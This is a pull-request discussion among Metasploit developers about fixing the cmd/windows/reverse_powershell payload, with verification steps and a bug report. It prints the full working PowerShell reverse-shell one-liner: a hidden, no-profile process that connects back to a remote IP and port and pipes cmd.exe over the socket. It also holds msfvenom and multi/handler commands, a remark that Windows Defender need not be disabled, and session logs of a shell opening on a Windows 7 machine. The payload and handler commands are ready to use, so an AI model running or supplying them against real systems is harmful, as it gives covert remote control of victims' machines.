fix #12579, fix the cmd/windows/reverse_powershell payload

[timwr]

This pull request fixes the cmd/windows/reverse_powershell payload so that it can pass output data to the socket asynchronously.

At the time of writing you do not need to disable Windows defender (until you do session -u)

Verification

• Ensure cmd_exec tests pass:

use exploit/multi/handler
set LHOST 192.168.56.1
set LPORT 4444
set ExitOnSession false
set payload windows/powershell_reverse_tcp
run -jz

# Get a session on Windows:
# msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.56.1 LPORT=4444 -o powershell.bat 

loadpath test/modules
use post/test/cmd_exec
set SESSION -1
set VERBOSE true
run

• Ensure session -u 1 works now
• Check the payload is still stable (e.g no 100% cpu usage, killing cmd.exe kills the session, killing the socket kills cmd.exe, etc)

[OJ]

+1 vote for the use of System.Text.UTF8Encoding instead?

$e = new-object System.Text.UTF8Encoding;

Be sure to use the above instead of System.Text.Encoding.UTF8 to avoid Byte Order Mark support.

[bwatters-r7]

Release Notes

This PR switches the powershell payload to an asynchronous read, preventing some issues where we return before we have a message.

[bcoles]

This PR appears to have fixed the issue by breaking cmd/windows/reverse_powershell.

A session is created, but there's no command prompt banner, and commands aren't executed.

./msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.191.165 LPORT=1337

powershell -w hidden -nop -c $a='172.16.191.165';$b=1337;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.ReadAsync($ob, 0, $ob.Length);$esread=$es.BaseStream.ReadAsync($eb, 0, $eb.Length);$c.connect($a,$b);$s=$c.GetStream();while ($true) {    start-sleep -m 100;    if ($osread.IsCompleted -and $osread.Result -ne 0) {      $s.Write($ob,0,$osread.Result);      $s.Flush();      $osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);    }    if ($esread.IsCompleted -and $esread.Result -ne 0) {      $s.Write($eb,0,$esread.Result);      $s.Flush();      $esread = $es.BaseStream.ReadAsync($eb, 0, $eb.Length);    }    if ($s.DataAvailable) {      $r=$s.Read($nb,0,$nb.Length);      if ($r -lt 1) {          break;      } else {          $str=$e.GetString($nb,0,$r);          $is.write($str);      }    }    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {        break;    };    if ($p.ExitCode -ne $null) {        break;    };};

Windows 7 SP1 (x64).

msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                         Payload opts
  --  ----                    -------                         ------------
  1   Exploit: multi/handler  cmd/windows/reverse_powershell  tcp://172.16.191.165:1337

msf5 exploit(multi/handler) > [*] Command shell session 4 opened (172.16.191.165:1337 -> 172.16.191.242:50023) at 2020-02-21 04:37:40 -0500

msf5 exploit(multi/handler) > Interrupt: use the 'exit' command to quit
msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...

dir





whoami
pwd







^C
Abort session 4? [y/N]  y
""

[*] 172.16.191.242 - Command shell session 4 closed.  Reason: User exit